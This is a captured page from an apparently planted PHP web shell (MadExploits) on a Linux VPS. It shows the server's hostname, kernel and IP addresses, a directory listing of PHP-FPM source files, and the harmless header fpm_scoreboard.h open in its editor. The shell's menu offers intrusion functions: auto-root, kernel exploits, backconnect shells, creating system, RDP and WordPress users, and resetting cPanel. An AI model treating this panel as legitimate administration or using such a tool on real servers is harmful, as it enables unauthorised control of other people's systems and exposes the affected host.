Linux vps-4302913.novaexata.com.br 3.10.0-1160.139.1.el7.tuxcare.els2.x86_64 #1 SMP Mon Nov 3 13:30:41 UTC 2025 x86_64
Apache
: 162.214.88.42 | : 216.73.216.14
166 Domain
7.3.33
wwnova
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
src /
debug /
php-5.6.40 /
sapi /
fpm /
fpm /
[ HOME SHELL ]
Name
Size
Permission
Action
events
[ DIR ]
drwxr-xr-x
fastcgi.c
25.94
KB
-rw-r--r--
fastcgi.h
4.47
KB
-rw-r--r--
fpm.c
2.84
KB
-rw-r--r--
fpm.h
1.13
KB
-rw-r--r--
fpm_arrays.h
1.82
KB
-rw-r--r--
fpm_atomic.h
3.95
KB
-rw-r--r--
fpm_children.c
10.99
KB
-rw-r--r--
fpm_children.h
873
B
-rw-r--r--
fpm_cleanup.c
849
B
-rw-r--r--
fpm_cleanup.h
519
B
-rw-r--r--
fpm_clock.c
2.23
KB
-rw-r--r--
fpm_clock.h
239
B
-rw-r--r--
fpm_conf.c
49.14
KB
-rw-r--r--
fpm_conf.h
2.43
KB
-rw-r--r--
fpm_env.c
5.39
KB
-rw-r--r--
fpm_env.h
491
B
-rw-r--r--
fpm_events.c
11.67
KB
-rw-r--r--
fpm_events.h
1.59
KB
-rw-r--r--
fpm_log.c
11.53
KB
-rw-r--r--
fpm_log.h
300
B
-rw-r--r--
fpm_main.c
62.74
KB
-rw-r--r--
fpm_php.c
6.42
KB
-rw-r--r--
fpm_php.h
1.23
KB
-rw-r--r--
fpm_php_trace.c
3.49
KB
-rw-r--r--
fpm_process_ctl.c
13.65
KB
-rw-r--r--
fpm_process_ctl.h
1.23
KB
-rw-r--r--
fpm_request.c
8.01
KB
-rw-r--r--
fpm_request.h
1.18
KB
-rw-r--r--
fpm_scoreboard.c
7.84
KB
-rw-r--r--
fpm_scoreboard.h
2.5
KB
-rw-r--r--
fpm_shm.c
1.23
KB
-rw-r--r--
fpm_shm.h
263
B
-rw-r--r--
fpm_signals.c
4.72
KB
-rw-r--r--
fpm_signals.h
315
B
-rw-r--r--
fpm_sockets.c
11.39
KB
-rw-r--r--
fpm_sockets.h
1006
B
-rw-r--r--
fpm_status.c
13.7
KB
-rw-r--r--
fpm_status.h
1.03
KB
-rw-r--r--
fpm_stdio.c
7.36
KB
-rw-r--r--
fpm_stdio.h
569
B
-rw-r--r--
fpm_str.h
483
B
-rw-r--r--
fpm_systemd.c
3.11
KB
-rw-r--r--
fpm_systemd.h
275
B
-rw-r--r--
fpm_trace.c
641
B
-rw-r--r--
fpm_trace.h
378
B
-rw-r--r--
fpm_trace_ptrace.c
1.6
KB
-rw-r--r--
fpm_unix.c
19.23
KB
-rw-r--r--
fpm_unix.h
518
B
-rw-r--r--
fpm_worker_pool.c
1.57
KB
-rw-r--r--
fpm_worker_pool.h
1.23
KB
-rw-r--r--
zlog.c
4.47
KB
-rw-r--r--
zlog.h
978
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : fpm_scoreboard.h
/* $Id: fpm_status.h 312263 2011-06-18 17:46:16Z felipe $ */ /* (c) 2009 Jerome Loyet */ #ifndef FPM_SCOREBOARD_H #define FPM_SCOREBOARD_H 1 #include <sys/time.h> #ifdef HAVE_TIMES #include <sys/times.h> #endif #include "fpm_request.h" #include "fpm_worker_pool.h" #include "fpm_atomic.h" #define FPM_SCOREBOARD_ACTION_SET 0 #define FPM_SCOREBOARD_ACTION_INC 1 struct fpm_scoreboard_proc_s { union { atomic_t lock; char dummy[16]; }; int used; time_t start_epoch; pid_t pid; unsigned long requests; enum fpm_request_stage_e request_stage; struct timeval accepted; struct timeval duration; time_t accepted_epoch; struct timeval tv; char request_uri[128]; char query_string[512]; char request_method[16]; size_t content_length; /* used with POST only */ char script_filename[256]; char auth_user[32]; #ifdef HAVE_TIMES struct tms cpu_accepted; struct timeval cpu_duration; struct tms last_request_cpu; struct timeval last_request_cpu_duration; #endif size_t memory; }; struct fpm_scoreboard_s { union { atomic_t lock; char dummy[16]; }; char pool[32]; int pm; time_t start_epoch; int idle; int active; int active_max; unsigned long int requests; unsigned int max_children_reached; int lq; int lq_max; unsigned int lq_len; unsigned int nprocs; int free_proc; unsigned long int slow_rq; struct fpm_scoreboard_proc_s *procs[]; }; int fpm_scoreboard_init_main(); int fpm_scoreboard_init_child(struct fpm_worker_pool_s *wp); void fpm_scoreboard_update(int idle, int active, int lq, int lq_len, int requests, int max_children_reached, int slow_rq, int action, struct fpm_scoreboard_s *scoreboard); struct fpm_scoreboard_s *fpm_scoreboard_get(); struct fpm_scoreboard_proc_s *fpm_scoreboard_proc_get(struct fpm_scoreboard_s *scoreboard, int child_index); struct fpm_scoreboard_s *fpm_scoreboard_acquire(struct fpm_scoreboard_s *scoreboard, int nohang); void fpm_scoreboard_release(struct fpm_scoreboard_s *scoreboard); struct fpm_scoreboard_proc_s *fpm_scoreboard_proc_acquire(struct fpm_scoreboard_s *scoreboard, int child_index, int nohang); void fpm_scoreboard_proc_release(struct fpm_scoreboard_proc_s *proc); void fpm_scoreboard_free(struct fpm_scoreboard_s *scoreboard); void fpm_scoreboard_child_use(struct fpm_scoreboard_s *scoreboard, int child_index, pid_t pid); void fpm_scoreboard_proc_free(struct fpm_scoreboard_s *scoreboard, int child_index); int fpm_scoreboard_proc_alloc(struct fpm_scoreboard_s *scoreboard, int *child_index); #ifdef HAVE_TIMES float fpm_scoreboard_get_tick(); #endif #endif
Close